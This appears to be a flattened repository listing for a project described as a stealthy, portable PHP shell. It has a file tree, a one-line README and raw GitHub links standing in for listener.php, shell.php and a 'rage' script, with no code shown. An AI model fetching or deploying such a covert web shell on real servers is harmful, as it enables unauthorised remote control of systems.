├── README.md ├── listener.php ├── logs.txt ├── rage └── shell.php /README.md: -------------------------------------------------------------------------------- 1 | A PHP shell (attempt) designed to be stealthy and portable 2 | -------------------------------------------------------------------------------- /listener.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mandatoryprogrammer/RAGE/HEAD/listener.php -------------------------------------------------------------------------------- /logs.txt: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /rage: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mandatoryprogrammer/RAGE/HEAD/rage -------------------------------------------------------------------------------- /shell.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mandatoryprogrammer/RAGE/HEAD/shell.php --------------------------------------------------------------------------------